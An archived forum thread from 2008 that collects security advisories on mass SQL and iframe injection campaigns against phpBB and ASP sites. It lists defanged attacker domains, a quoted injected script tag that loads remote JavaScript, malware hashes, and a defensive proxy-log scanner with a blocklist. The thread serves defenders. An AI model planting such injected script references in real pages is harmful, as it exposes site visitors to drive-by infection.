View Full Version : Thousands of sites infected - archive

2008-03-11, 11:15

Macvirus.org site compromised
- http://sunbeltblog.blogspot.com/2008/03/oops-macvirusorg-hosting-porno-malware.html
March 10, 2008 - "...Macvirus.org, a website dedicated to “keeping an eye on Mac viruses”, has had their discussion forums seeded with vast amounts of forum spam pushing various junk and lots of hardcore porn, including a number pushing malware (fake codecs)... pushing fake codecs for -both- Mac and Windows platforms (the site serving the fake codec simply detects your user agent and delivers the appropriate malware)..."
(Screenshots available at the URL above.)


Annual Weblog Awards ("Bloggies") site compromised
- http://blog.trendmicro.com/bloggies-gives-out-malware-before-awards/
March 10, 2008 - "...The Web site of the Annual Weblogs Awards — more informally known as the Bloggies — was hacked recently, serving up a malicious Javascript to its visitors. This happened on the eve of the award ceremony, as reported in NEWS.com.au*. Upon loading, the site reportedly connects to the URL hxxp ://www.{BLOCKED}nwww.biz/1/1/ice-pack/ index.php that Trend Micro researchers have verified to be malicious. It downloads the file INDEX.PHP, which is detected as JS_PSYME.ANT. This JavaScript Quicktime exploit in turn connects to the URL hxxp ://{BLOCKED}nwww.biz/1/1/ice-pack/ exe.php to download a file that is detected as TROJ_DROPPER.XX. Whoever orchestrated this attack played on timing, knowing that people would more likely visit the Bloggies Web site on the eve of the awarding ceremony itself. Unfortunately, safe surfing measures can be useless as even the most trusted Web sites can be hacked to serve up malware... Trend Micro advises surfers to keep their software updated, especially their AV products to evade infection."
* http://www.news.com.au/technology/story/0,25642,23345956-5014108,00.html
(Screenshots available at both URLs above.)


2008-03-13, 14:29

- http://www.avertlabs.com/research/blog/index.php/2008/03/12/another-mass-attack-underway/
March 12, 2008 - "On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:
* MS06-014
* RealPlayer (ActiveX Control)
* Baofeng Storm (ActiveX Control)
* Xunlei Thunder DapPlayer (ActiveX Control)
* Ourgame GLWorld GlobalLink Chat (ActiveX Control)
This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers. Preliminary research results suggest more than 10,000 pages were affected by this hack attack..."
(Screenshot available at the URL above.)

- http://preview.tinyurl.com/2l3b99
March 13, 2008 (Computerworld) - "...The Web attack, which appears to be a coordinated effort run out of servers in China, was first noticed by McAfee researchers on Wednesday morning. Within hours, the security company had tracked more than 10,000 Web pages infected on hundreds of Web sites... This same technique was used a year ago, when attackers infected the Web sites of the Miami Dolphins and Dolphins Stadium just prior to the 2007 Super Bowl XLI football game. The attack code takes advantage of bugs that have already been patched, so users whose software is up-to-date are not at risk. However, McAfee warns that some of the exploits are for obscure programs such as ActiveX controls for online games, which users may not think to patch. If the code is successful, it then installs a password-stealing program on the victim's computer that looks for passwords for a number of online games..."


2008-03-13, 15:42

- http://www.theregister.co.uk/2008/03/13/mass_compromise/
13 March 2008 - "...Compromised web pages include travel sites, government websites, and hobbyist sites that have been modified with JavaScript code that silently redirects visitors to a site in China under the control of hackers. Miscreants likely reprogrammed the web pages after scanning the net for insecure servers. The malware cocktail attempts to exploit vulnerabilities in Windows, RealPlayer, and other applications to break into insecure PCs... Components of the malware attempt to steal passwords to online games while others leave a back door that allows the installation of additional malicious programs... A single organisation or small group is likely behind this attack, as the malicious code on all these pages is served up from the same server in China..."


2008-03-13, 21:10
Apparently, still in use:

- http://www.finjan.com/Content.aspx?id=1367
(Malicious Page of the Month - synopsis - January 2008)
"...More than 10,000 websites in the US were infected in December by a new variant of (a) crimeware toolkit. The attack, which Finjan has designated 'random js toolkit', is an extremely elusive crimeware Trojan that infects an end user’s machine and sends data from the machine via the Internet to the Trojan's “master”, a cybercriminal."

- http://www.us-cert.gov/current/#website_compromises_facilitating_exploitation_of
March 13, 2008


2008-03-14, 03:41

- http://preview.tinyurl.com/39s9kz
March 13, 2008 (Computerworld) - "Antivirus vendor Trend Micro Inc. confirmed Thursday that "some portions" of its site had been hacked earlier this week, but hedged when asked if those pages had been serving up attack code to unsuspecting visitors... The English-language edition of the Yomiuri Shimbun, one of Japan's largest newspapers, said Trend Micro's site was hacked around 9:00 p.m. Sunday, Tokyo time (7:00 p.m. Eastern, on Saturday, in the U.S.)... The alert also said that users could have been infected by accessing one of 11 infected pages on the Japanese site or 20 pages on the English site, or by clicking a link embedded in the malware's name. All the pages were part of Trend Micro's malware encyclopedia, a searchable database of viruses, Trojans and worms. Sweeny, Trend's U.S. spokesman said "about 32" pages were involved, "most of them from the encyclopedia." Other reports speculated that the Trend Micro hack was part of the larger campaign that has infected some 20,000 pages in the past few days. According to researchers at McAfee Inc., those hacks are script-injection attacks that reference JavaScript attack code..."
* http://www.sophos.com/security/blog/2008/03/1186.html
"...According to reports in the Japanese media, a number of webpages on the firm’s Japanese and English-language website were altered by hackers on Sunday 9 March, who used a malicious iFrame exploit to deliver a Trojan horse onto surfers’ computers. Trend Micro is believed to have uncovered the problem on Wednesday 12 March and replaced affected pages with a message saying “This page is temporarily shut down for emergency maintenance”... It is believed that a SQL vulnerability on the site was exploited by the hackers... In a nutshell - what has happened here is a criminal act, and our friends at Trend Micro (and people visiting the hacked pages) are victims of the crime... This isn’t the time or place to make cheap shots against a competitor... Sophos discovers a new infected webpage every 14 seconds..."


2008-03-14, 13:38

- http://preview.tinyurl.com/3xs996
March 13, 2008 (AvertLabs blog) - "Yesterday we uncovered a newer mass hack affecting over 10,000 web pages. That number has since doubled. Today, I took a look at another recent mass attack, which was similar to those reported by Dancho Danchev, but references a JS file rather than an IFRAME. The attack seems to have started more than a week ago, and nearly 200,000 web pages have been found to be compromised, most of which are running phpBB. This contrasts with yesterday's attack, in which the vast majority of pages were active server pages (.ASP). The ASP attacks are different from the phpBB ones in that the payload and method are quite different. Various exploits are used in the ASP attacks, whereas the phpBB ones rely on social engineering. phpBB mass hacks have occurred in the past, including those done by the Perl/Santy.worm back in 2004..."


2008-03-14, 17:09

- http://isc.sans.org/diary.html?storyid=4139
Last Updated: 2008-03-14 16:28:06 UTC ...(Version: 2)
Over 10,000 legitimate websites [should read "pages"?] have been compromised and now have an iframe that will direct visitors to a malicious website hosted on 2117966.net. The malicious website attempts to exploit the vulnerabilities described in MS06-014, MS07-004, MS06-067, MS06-057 and a number of ActiveX vulnerabilities. Successful exploitation results in the installation of a password-stealing malicious program that attempts to steal logon credentials for websites and online games.
- Recommended immediate action:
Block 2117966.net at your web proxy
- Recommended follow-up action:
Inspect your web proxy logs for visitors to 2117966.net. This will indicate who is potentially exposed. Check these systems to verify that their patches are up-to-date. Systems that are successfully compromised will begin sending traffic to ( http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313 ). Search your proxy logs for systems generating those requests and reimage the infected machines.
- Protecting Browsers:
A properly-patched system should not be at risk from this attack. It is recommended to use a browser that does not support ActiveX..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313#toc1
"...2117966.net - Please do NOT visit this website, it should be considered dangerous..."

- http://www.us-cert.gov/current/current_activity.html#website_compromises_facilitating_exploitation_of
updated March 14, 2008 at 12:56 pm (EDT)
"...This issue is currently exploiting a variety of vulnerabilities:
* Baofeng Storm ActiveX
* Ourgame GLChat ActiveX
* Microsoft Internet Explorer VML (VU#122084)
* Qvod Player ActiveX
* Microsoft RDS.Dataspace ActiveX (VU#234812)
* RealPlayer playlist ActiveX (VU#871673)
* Storm Player ActiveX
* Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)
* Xunlei Thunder DapPlayer ActiveX ...

- http://isc.sans.org/diary.html?storyid=4139
Last Updated: 2008-03-16 14:21:29 UTC ...(Version: 4)
"Update: this was misidentified as an iframe injection when in fact it was a javascript link on the altered ASP* pages."
* Active Server Page(s) (Microsoft web scripting language and file extension)

(Still, block that URL.)
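The ISC diary's follow-up step (search the proxy logs for anyone who reached 2117966.net, then verify those machines' patch level) is easy to automate. The script below is an added example written for this thread, not code from ISC, Shadowserver or US-CERT. It reads Squid-style access.log lines, which are constructed here (the client addresses and the .js paths are made up), and matches hosts label by label so that a look-alike such as 2117966.net.example.org does not trigger a false hit while www.2117966.net and CONNECT tunnels to it do.

```python
"""Scan a Squid-style proxy access log for clients that fetched a blocklisted host.

Added example; not from the ISC diary. It implements the diary's follow-up
action (find who reached the malicious host, then check those systems).
The log lines are constructed; clients and .js paths on them are made up.
"""
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Hosts this thread names as serving the injected script or exploit pages.
BLOCKLIST = {"2117966.net", "free.hostpinoy.com"}

# Constructed sample in Squid native access.log format:
# <epoch> <elapsed> <client> <action/code> <bytes> <method> <url> <ident> <hier> <type>
SAMPLE_LOG = """\
1205492400.123  245 10.0.0.17 TCP_MISS/200 1832 GET http://www.example.com/news.asp?id=42 - DIRECT/203.0.113.5 text/html
1205492401.456  118 10.0.0.17 TCP_MISS/200 2210 GET http://www.2117966.net/x.js - DIRECT/198.51.100.7 application/x-javascript
1205492402.789   90 10.0.0.23 TCP_MISS/200  512 GET http://cdn.free.hostpinoy.com/y.js - DIRECT/198.51.100.9 application/x-javascript
1205492403.000   60 10.0.0.31 TCP_MISS/200 3000 GET http://2117966.net.example.org/ - DIRECT/203.0.113.9 text/html
1205492404.000   15 10.0.0.42 TCP_TUNNEL/200 0 CONNECT www.2117966.net:443 - DIRECT/198.51.100.7 -
"""


def url_host(url):
    """Return the lowercase hostname of a proxied URL, or None."""
    if "://" in url:
        host = urlsplit(url).hostname
    else:
        # CONNECT requests are logged as "host:port" with no scheme
        host = url.rsplit(":", 1)[0]
    return host.lower().rstrip(".") if host else None


def host_is_blocked(hostname, blocklist):
    """True if hostname is a blocklisted domain or a subdomain of one.

    Compares whole labels, so '2117966.net.example.org' does not match
    '2117966.net' while 'www.2117966.net' does.
    """
    hostname = hostname.lower().rstrip(".")
    return any(hostname == d or hostname.endswith("." + d) for d in blocklist)


def exposed_clients(log_text, blocklist):
    """Map each client IP that fetched a blocklisted host to its requests.

    Returns {client: [(iso_timestamp, url), ...]} in log order.
    """
    hits = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # blank or truncated line
        ts, client, url = fields[0], fields[2], fields[6]
        host = url_host(url)
        if host and host_is_blocked(host, blocklist):
            when = datetime.fromtimestamp(float(ts), tz=timezone.utc).isoformat()
            hits.setdefault(client, []).append((when, url))
    return hits


if __name__ == "__main__":
    for client, reqs in sorted(exposed_clients(SAMPLE_LOG, BLOCKLIST).items()):
        print(client)
        for when, url in reqs:
            print("   ", when, url)
```

Every client the script lists is "potentially exposed" in the diary's sense: it fetched the script, not necessarily the executable. Confirming infection is the separate step of looking for the post-infection traffic Shadowserver documented.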


2008-03-15, 18:59

The -Other- iframe attack...
- http://isc.sans.org/diary.html?storyid=4144
Last Updated: 2008-03-15 17:23:13 UTC - "...The 2117966.net (please, do NOT visit that site) campaign affected approximately 13,800 ASP pages. No php pages.

>>> This -other- attack is reported to have affected around 200,000 phpBB pages. It's a bigger attack and very important, you should read Dancho's blog, it has IP addresses and domains to look for in your logs as well as what traffic an infected system will generate. If you're a website administrator, also take a close read of his 04-MAR-2008 entry:
Pay particular attention to how they're inserting the code into the site (from Dancho's Blog):
"(The sites) themselves aren't compromised, their SEO practices of locally caching any search queries submitted are abused. Basically, whenever the malicious attacker is feeding the search engine with popular queries, the sites are caching the search results, so when the malicious party is also searching for the IFRAME in a "loadable state" next to the keyword, it loads. Therefore, relying on the high page ranks of both sites, the probability to have the cached pages with the popular key words easy to find on the major search engines, with the now "creative" combination of the embedded IFRAME, becomes a reality if you even take a modest sample, mostly names."

This is important. It's not obvious to me how to fix the problem..."


2008-03-17, 10:57

IFRAME redirects...
- http://www.networkworld.com/news/2008/031308-hackers-launch-massive-iframe.html
03/16/2008 - "...Danchev* listed more than 20 sites that together account for more than 401,000 IFRAME-injected pages... he had identified more than 100 bogus .info domains that were acting as the second-stage redirectors. Trace it back far enough, and the path leads to the Russian Business Network (RBN)... "What this means is that known Russian Business Network netblocks are receiving all the re-routed DNS queries from infected hosts, thereby setting up the foundations for a large scale pharming attack"... If users rejected the bogus call to install the codec, the string is broken, and no harm can come to them. Web site operators, on the other hand, can take a number of steps, including properly sanitizing all user input or not caching previous searches..."
* http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
March 12, 2008 - "...a new malware variant of Zlob is attempting to install through an ActiveX object. These are the high profile sites targeted by the same group within the past 48 hours, with number of locally cached and IFRAME injected pages within their search engines..."

** http://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html
March 10, 2008 - "...The attack is still ongoing, this time successfully injecting a multitude of new domains into Wired Magazine, and History.com's search engines, which are again caching anything submitted, particularly not validated input to have the malicious parties in the face of the RBN introducing a new malware..."

Example: http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651
Latest DAT Release 03 13 2008 - "This fake codec is actually a hijacker that will change your DNS settings whether you acquire your IP settings through DHCP or set your IP information manually. This hijacker will attempt to re-route all your DNS queries through 85.255.x.29 or 85.255.x.121 (RBN).... rogue DNS servers..."


2008-03-18, 22:36

MSNBC is latest victim in mass javascript injection
- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=848
March 18, 2008 - "... the official Web site of MSNBC Sports has been compromised with malicious code. This same attack has compromised dozens of other high-profile sites such as ZDNet, archive.org, wired.com, and history.com. We have notified the owners of MSNBC of the malicious content on their site. This attack has been discussed in our previous blog*. It is important to note that the hub site that is hosting the malicious JavaScript is currently down...
(Other) References:
* http://www.websense.com/securitylabs/blog/blog.php?BlogID=179
** http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html ..."

(Screenshot available at the Websense URL above.)


2008-03-19, 01:46
Have a look...

Malicious site: MSNBC Sports compromised
1- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=848
March 18, 2008

Spammers using Google ads to redirect users to Malware:
2- http://preview.tinyurl.com/2opnkh
March 17, 2008 (McAfee Avert Labs)

IFRAME redirects...
3- http://www.networkworld.com/news/2008/031308-hackers-launch-massive-iframe.html
March 16, 2008 - "...Danchev* listed more than 20 sites that together account for more than 401,000 IFRAME-injected pages... he had identified more than 100 bogus .info domains that were acting as the second-stage redirectors. Trace it back far enough, and the path leads to the Russian Business Network (RBN)..."
* http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
March 12, 2008

Shadowserver report: I/P in China serving malicious javascript...
4- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313#toc1
March 13, 2008 - ...in conjunction/coordination with:
4A- http://www.us-cert.gov/current/#search_engine_iframe_injection_attacks
updated March 14, 2008
4B- http://www.us-cert.gov/current/#website_compromises_facilitating_exploitation_of
updated March 14, 2008

(Multiple sites) ...getting RBN-ed
5- http://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html
March 10, 2008 - "...The attack is still ongoing, this time successfully injecting a multitude of new domains into Wired Magazine, and History.com's search engines, which are again caching anything submitted, particularly not validated input to have the malicious parties in the face of the RBN introducing a new malware..."
Example: http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651

More to come...


2008-03-20, 17:45

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(03.20.2008) - "...DeepSight Threat Analyst Team is currently monitoring a number of ongoing mass SQL-injection attacks that are manipulating victim servers to host malicious content to browsing clients.
- A number of these attacks are currently being carried out. One attack involves a failure to sanitize cached search results, allowing malicious HTML to be injected into search result pages. This has affected a number of high-profile sites and has been thoroughly documented by the researcher who originally discovered the attacks: ( http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html )
- Another attack is currently targeting servers running vulnerable ASP scripts that can be exploited through SQL injection to host malicious HTML code. The injected code references a malicious script... which in turn injects an IFRAME into the page to redirect users to a site that tries to exploit various known and patched vulnerabilities. This attack is believed to have affected over 15,000 pages, but the number of unique servers compromised may be far less.
- Yet another large-scale attack involving SQL injection is targeting servers running PHPBB. This attack injects HTML code that loads a malicious JavaScript file from 'free.hostpinoy.com'. Reports indicate that this attack is much more prevalent, perhaps because of the ubiquity of PHPBB. Over 150,000 pages may be affected. Note again, however, that the number of unique servers compromised may be far less. In previously observed cases, over 5000 pages have been affected on a single domain. At the time of writing, most of the sites hosting the exploits or malicious JavaScript are down, but they may come back online at any time. Administrators are advised to audit their web services to ensure that no exploitable flaws exist in the publicly exposed scripts and that the latest versions are installed. Network admins are advised to block access to '2117966.net' and 'free.hostpinoy.com' at the gateway.

Clients are advised to browse using strict security policies. The following list of strategies may prevent or hamper an attack:
- Run browser software with the least privileges possible.
- Disable JavaScript, IFRAMEs, and ActiveX controls.
- Enable OS security mechanisms such as Data Execution Prevention (DEP).
- Ensure that browsing software is up to date.
- Filter all web activity through security products such as an Intrusion Prevention system."

EDIT/ADD: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080320
20 March 2008 - "...In our last post we mentioned the several thousands of websites that were SQL injected to reference malicious JavaScript code on 2117966.net. At the time we were actually just taking an educated guess that this was the result of SQL injection. However, it has since been confirmed... It turns out this is the same IP address that carried out the SQL injection attacks related to the uc8010.com incident*. Not very subtle are they? You might want to keep an eye out for the IP"
* http://isc.sans.org/diary.html?storyid=3823

(Please do NOT visit any of those IP's in the commentary - they all should be considered dangerous.)


2008-03-31, 03:01

- http://www.sophos.com/security/blog/2008/03/1243.html
30 March 2008 - "...Our data for all records processed since March 1st 2008 (so approximately 4 weeks worth of data). The data reveals almost 11,000 pages compromised with Troj/Unif-B, split across approximately 4,500 different domains. That is a fair amount of activity, approximately 150 new domains each day (and this is just what we are seeing)... For the 4,500 compromised domains, these targets fall into two categories:
1. additional attack sites. Some other site which hits the victim with exploits.
2. redirect or ‘control’ sites. Some other site, controlled by the attacker, which can be used to direct traffic (as discussed previously). Typically, these sites direct victims to one of several other attack sites (though there may be several redirects in use). There are a number of prominent attacks visible in the data:
* ~30% use a renowned attack site for installing various malware including Mal/Dropper-T, Mal/EncPk-CM and Mal/EncPk-CO.
* Tibs: over 10% are redirect sites under the control of a large and well coordinated group. Numerous domains have been used by this group in recent months to install a variety of Dorf, Tibs and other malware.
* Zbot: almost 10% load exploits intended to install a member of the Mal/Zbot family.
* Gpack: approximately 5% point to a single GPack attack site, which installs malware detected as Mal/Emogen-Y.
....something recently talked about by Roger Thompson, on the Exploit Prevention Labs blog*... As speculated previously ( http://www.sophos.com/images/sophoslabs-blog/2008/02/map.png ), it is not unlikely that these sites could be used to make money by selling ‘traffic flow’ (attackers essentially paying for victims to be directed to their attack sites for a period of time)..."

* http://explabs.blogspot.com/2008/03/gpack.html
March 28, 2008 - "...It's just javascript, and thus far, we've only seen one exploit come out of it ... a mouldy, old MS06-014, although we expect there are more than that... while there is clearly more than one set of Bad Guys involved, most of them seem to be hosted by the same ISP, because the exploit IPs are similar..."


2008-04-12, 15:55

Election time in Italy, complete with Trojan
- http://preview.tinyurl.com/52adbn
April 11, 2008 - "Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The Web site is hosting a malicious iframe that leads to a typical browser exploit using the Neosploit tool, which forces an infected computer to install the newest version of Trojan.Mebroot. Using elections as a channel for spreading malicious code is something we have already seen (for example, Srizbi*) and it’s now election time in Italy as well, with the vote set to happen next Sunday and Monday, April 13th and 14th, 2008. Nonetheless, unless the Mebroot gang is interested in Italian politics, I do not believe the Web site has been compromised for political reasons. We have recently seen the group uploading malicious iframes** on many different Web sites for their purposes, with complete disregard for the content..."
* http://preview.tinyurl.com/2349ds

** http://preview.tinyurl.com/yrxcym


2008-04-22, 22:32

- http://securitylabs.websense.com/content/Alerts/3070.aspx
04.22.2008 - "...malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related... In the last few hours we have seen the number of compromised sites increase by a factor of ten. This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on hxxp ://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously, files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing. There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here*... It appears that same tool was used to orchestrate this attack too. When we first started tracking the use of this domain, the malicious JavaScript was still making use of hxxp ://www.nmida[removed].com/... Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search... The number of sites affected is in the hundreds of thousands..."
* http://isc.sans.org/diary.html?n&storyid=4294
Last Updated: 2008-04-16 19:14:00 UTC


2008-04-24, 23:03

Hundreds of thousands of SQL injections
- http://isc.sans.org/diary.html?storyid=4331
Last Updated: 2008-04-24 19:36:50 UTC - "UPDATE.
It is recommended that you block access to hxxp :/www .nihaorr1.com and the IP it resolves to, 219DOT153DOT46DOT28, at the edge or border of your network.
1.js is the file they are currently injecting. That could change, and it has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many Windows-based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site, as you are very likely to get infected. Trend Micro named the malware toj_agent.KAQ; it watches for passwords and passes them back to the controller’s IP.
The crew over at Shadowserver has published additional information related to SQL-injected sites. They included the botnet controller's IP address and a content-based Snort signature for the bot control traffic that is not IP dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
They have hit city websites, commercial sites and even government websites. This type of injection pretty much nulls and voids the concept of “trusted websites” or "safe sites".
The register covered it stating their search returned 173k injected results:
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more than once.
Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html
Websense has good information on it here:
We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/diary.html?storyid=4294 ..."


2008-04-25, 17:47
FYI... (DO NOT visit the sites mentioned in the commentary as you are very likely to get infected - BLOCK them, but don't go there.)

- http://www.f-secure.com/weblog/archives/00001427.html
April 24, 2008 - "...As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera. Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls... It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code. So far three different domains have been used to host the malicious content — nmidahena .com, aspder .com and nihaorr1 .com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them.
So what should you do?
- First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected.
- Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there.
- Third, block access to the sites above.
- Fourth, make sure the software you use is patched...
- Fifth, keep your antivirus solution up-to-date."

(Note: per http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones... it most likely won't take too long for others to catch on and possibly conducting even more nefarious activities. If your site has fallen victim to one of these attacks, it's not just important you remove the offending injections, but it's even more important you fix the SQL injection attack vector. If you do not, your website will continue to be vulnerable to similar or worse attacks.")

(...where the other factors enter in)
- http://preview.tinyurl.com/6c8bet - 04/24/2008 (Networkworld) - "... SQL injection attacks on Microsoft Internet Information Servers are leaving Web pages with malicious -iFrames- in them... Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag..."


2008-04-26, 13:53
For clarification:

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

>>> http://www.f-secure.com/weblog/archives/00001427.html
April 24, 2008 - "...So far three different domains have been used to host the malicious content
— nmidahena .com*, aspder .com and nihaorr1 .com.
There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them..."

4.26.2008 - NOW
- http://centralops.net/co/DomainDossier.aspx
aspder .com ***
country: CN
nihaorr1 .com ***
country: CN
nmidahena .com *
Could not find an IP address for this domain name.
* (Note: per http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones...)


2008-05-07, 12:59

- http://isc.sans.org/diary.html?storyid=4393
Last Updated: 2008-05-07 05:12:53 UTC - "A loyal ISC reader... wrote in to point us at what looks to be a SQL Injection worm that is on the loose. From a quick google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier. Right now we can't speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites. It looks like the infection of user machines is by Real Player vulnerabilities that seem more or less detected pretty well. The details, the script source that is injected into webpages is hxxp ://winzipices .cn /#.js (where # is 1-5). This, in turn, points to a cooresponding asp page on the same server. (i.e. hxxp :// winzipices .cn/#.asp). This in turn points back to the exploits. Either from the cnzz .com domain or the 51 .la domain. The cnzz .com (hxxp ://s141 .cnzz .com) domain looks like it could be set up for single flux, but it's the same pool of IP address all the time right now. hxxp ://www .51 .la just points to 51la .ajiang .net which has a short TTL, but only one IP is serving it.
Fair warning, if you google this hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page. Proceed at your own risk.
UPDATE: We're also seeing this website serving up some attacks in connection with this SQL Worm
(hxxp ://bbs .jueduizuan .com)"


2008-05-07, 21:01

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507
7 May 2008
"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations. It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here are different than the last few attacks. If your website has been hacked or you are visiting a hacked website, you will find something like this in your HTML source in the page you visit:
"<script src=hxxp ://winzipices .cn/ 5.js></script>"
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn has hidden iframes...
Malware Binaries:
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
-winzipices.cn []
Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names."


2008-05-10, 10:47
(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

SQL injection continues
- http://www.f-secure.com/weblog/archives/00001432.html
May 10, 2008 - "...The attacks have now started again, this time pointing to several different domains. During the last few days we've seen the same type of encoded SQL script as in the previous case being inserted into ASP/ASP.NET pages. The scripts point to the following domains:
yl18 .net
www .bluell .cn
www .kisswow .com .cn
www .ririwow .cn
winzipices .cn
All of the domains above are pointing to IP addresses in China. Just like last time the scripts try to use several exploits to infect the user's computer."

- http://blog.trendmicro.com/more-than-a-half-a-million-web-sites-compromised/
May 10, 2008 - "...some several thousands of Web sites try to recover from being hacked via SQL injection barely two days ago, in comes another massive attack on more than half a million Web sites. Advanced Threats Research Program Manager Ivan Macalintal found the malicious script JS_SMALL.QT injected into various Web sites believed to be either using poorly implemented phpBB, or are using older, exploitable versions of the said program... In true ZLOB fashion, this variant poses as a video codec installer... These types of Trojans are known for changing an affected system’s local DNS and Internet browser settings, thus making the system vulnerable for even more potential threats..."


2008-05-12, 03:51

Mass File Injection Attack
- http://isc.sans.org/diary.html?storyid=4405
Last Updated: 2008-05-11 21:48:56 UTC - "We received a report... this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob. If you do a google search for these two URLs, you get about 400,000 sites that have a call to this Javascript file included in them now. The major portion of the sites seem to be running phpBB forum software.
If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites. Internal clients that have connected may need some cleanup work. Another preventive step would be to blacklist these two URLs.

hxxp ://free .hostpinoy .info /f.js
hxxp ://xprmn4u.info /f .js "


2008-05-13, 17:48

- http://www.techworld.com/security/news/index.cfm?newsID=101475&pagtype=all
13 May 2008 - "..."This is an on-going campaign, with new domains [hosting the malware] popping up even this morning," said Paul Ferguson, a network architect with anti-virus vendor Trend Micro. "The domains are changing constantly." According to Ferguson, over half a million legitimate websites have been hacked by today's mass-scale attack, only the latest in a string that goes back to at least January. All of the sites, he confirmed, are running "phpBB", an open-source message forum manager... Visitors to a hacked site are redirected through a series of servers, some clearly compromised themselves, until the last in the chain is reached. That server then pings the PC for any one of several vulnerabilities, including bugs in both Internet Explorer and the RealPlayer media player. If any of the vulnerabilities are present, the PC is exploited and malware is downloaded to it..."
